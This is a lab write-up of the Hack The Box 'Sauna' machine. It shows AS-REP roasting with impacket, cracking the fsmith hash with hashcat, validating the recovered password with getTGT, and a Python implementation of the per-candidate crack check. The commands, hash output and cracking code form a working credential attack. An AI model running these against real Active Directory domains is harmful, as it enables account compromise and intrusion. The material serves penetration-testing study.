ASREPRoasting
Although I wasn't able to get any additional users out of a brute-force attack after learning the naming convention, I still have 2 valid domain users extracted from the initial brute-force attack against the target KDC. Since there doesn't appear to be any other attack vector, I will try to work with these 2 users.
Considering I only know 2 valid domain usernames and no passwords, it would be a good idea to start with ASREPRoasting. GetNPUsers sends an AS-REQ for each name in the list without pre-authentication data; for any account that has pre-authentication disabled, the KDC answers with an AS-REP whose encrypted part is keyed with that user's password hash and can be cracked offline, while for everyone else the KDC responds with an error that still tells us whether the name exists.
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile valid_users -request -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$fsmith@egotistical-bank.local:307dbe778ef04ab4d2cfbb4f8dbebba9$[...]
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
It turns out that the fsmith user has the UF_DONT_REQUIRE_PREAUTH bit set, so the KDC returned an AS-REP for that account with no proof of the password, and GetNPUsers printed its encrypted part in hashcat's $krb5asrep$23$ format (etype 23 is RC4-HMAC, keyed with fsmith's NT hash).
The "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines confirm that administrator and hsmith exist but require pre-authentication, and the two KDC_ERR_CLIENT_REVOKED errors are the KDC's answer for accounts that are disabled, expired or locked out, so those names are valid but unusable.
A pre-auth-disabled account is an unlikely find in practice, but here we are. Lucky me.
Time to get cracking.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ hashcat -a 0 -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:307dbe778ef04ab4d2cfbb4f8dbebba9$fdd98cb2d80cc2b43db211f26d29d1aba4032cd2885a3e62a4cb16eddb796656f1f97c604805596ba70fd169ae370a3aa98e63caebca912bbd4293d810479cc43830fc0cc22911a05833f98fbea8b60aa87492cbd27f098a674132d8bc32b470853d057520d8abb2788ef0e1d2cdbed911fc7d951daa36d73216230c822add4f545e73e0ffa9f8c8a4b0270b2071a2bd15e5cf916c7dd17e0ed0880ff4d995a6155599ab9f147fe0772207378b176eec74900619ac45a19a42a47cd12966b3e5a0135bc900d7859c7f3232ddfcf765789dc1043fc63fe515bc733a22a54185c830b8b078cd57e8d35acdb916539e632410443023df650b32571ff6cbde7ded8b:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:307dbe7...7ded8b
Time.Started.....: Sat Mar 25 17:49:22 2023 (8 secs)
Time.Estimated...: Sat Mar 25 17:49:30 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1126.7 kH/s (0.44ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539264/14344385 (73.47%)
Rejected.........: 0/10539264 (0.00%)
Restore.Point....: 10538496/14344385 (73.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Thip1812 -> Thebasket_zaa
Hardware.Mon.#1..: Util: 61%
Started: Sat Mar 25 17:49:21 2023
Stopped: Sat Mar 25 17:49:32 2023
hashcat cracked the hash in a few seconds against rockyou.txt, checking each candidate with the same RC4-HMAC computation the KDC used.
The cracked password is Thestrokes23.
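As an added example (my own code, not hashcat's, impacket's or the writeup author's), the following Python shows what the ASREPRoasting step above produced and what hashcat mode 18200 does with every candidate: derive the NT hash (MD4 over the UTF-16LE password), derive the RFC 4757 RC4-HMAC keys for key usage 8 (the AS-REP enc-part), decrypt the blob and compare the HMAC-MD5 checksum. It also builds a synthetic AS-REP blob so it runs offline; the plaintext is a constructed stand-in for an EncASRepPart (only the leading ASN.1 tag is realistic), the confounder is random as on a real KDC, and the function names are my own. MD4 is implemented by hand because hashlib's md4 is often unavailable on OpenSSL 3 systems.

```python
# AS-REP roast check in plain Python: what hashcat mode 18200 does per candidate.
# Added example for this writeup (not hashcat, impacket or the author's code).
import hashlib
import hmac
import os
import re
import struct

MASK = 0xFFFFFFFF
ASREP_USAGE = 8  # key usage for the AS-REP enc-part (TGS-REP / Kerberoast uses 2)
ASREP_RE = re.compile(r"^\$krb5asrep\$23\$([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. NT hash = md4(password.encode('utf-16-le'))."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [(i % 4) * 4 + i // 4 for i in range(16)]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        # Each step rotates (a, b, c, d) so one expression covers a whole round.
        for i in range(16):
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def k1_for(password: str, usage: int = ASREP_USAGE) -> bytes:
    """K1 = HMAC-MD5(NT hash, usage as 4-byte little-endian), per RFC 4757."""
    return hmac_md5(md4(password.encode("utf-16-le")), struct.pack("<I", usage))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(password: str, plaintext: bytes, confounder: bytes = None):
    """KDC side: returns (checksum, ciphertext), the two halves hashcat splits on '$'."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = k1_for(password)
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, data)


def format_asrep_hash(user: str, realm: str, checksum: bytes, ciphertext: bytes) -> str:
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ciphertext.hex()}"


def parse_asrep_hash(line: str):
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$23$ hash line")
    return m.group(1), bytes.fromhex(m.group(2)), bytes.fromhex(m.group(3))


def check_candidate(line: str, password: str) -> bool:
    """Cracker side: decrypt with the candidate's key and verify the checksum."""
    _, checksum, ciphertext = parse_asrep_hash(line)
    k1 = k1_for(password)
    plaintext = rc4(hmac_md5(k1, checksum), ciphertext)
    # Cheap early reject: after the 8-byte confounder an EncASRepPart starts
    # with the ASN.1 APPLICATION 25 tag, 0x79. The HMAC is the real verdict.
    if len(plaintext) < 9 or plaintext[8] != 0x79:
        return False
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def crack(line: str, wordlist):
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


# Constructed stand-in for an EncASRepPart: only the leading tag is realistic.
DEMO_PLAINTEXT = b"\x79\x81\x1e\x30\x81\x1b" + b"\x00" * 27

if __name__ == "__main__":
    chk, ct = rc4_hmac_encrypt("Thestrokes23", DEMO_PLAINTEXT)
    line = format_asrep_hash("fsmith", "EGOTISTICAL-BANK.LOCAL", chk, ct)
    print(line)
    print("cracked:", crack(line, ["password", "Summer2023", "Thestrokes23"]))
```

Feeding check_candidate the full fsmith line from the hashcat output above with the candidate Thestrokes23 should return True, provided the hash was copied intact; the synthetic line in main exercises the same code path without depending on that. The tag check is only an optimisation, a wrong candidate that happens to decrypt to 0x79 still fails the HMAC comparison.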
Now I need to validate the credential.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-getTGT egotistical-bank.local/fsmith:Thestrokes23 -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in fsmith.ccache
The credential of the fsmith user has been validated against the target KDC: it accepted the password and issued a TGT, which getTGT saved in fsmith.ccache.
This is a legitimately issued TGT rather than a forged one, and it will be used from here on out for better OPSEC: exporting it with KRB5CCNAME=fsmith.ccache and passing -k -no-pass to the impacket tools authenticates with Kerberos instead of sending the password or NTLM hash to each service.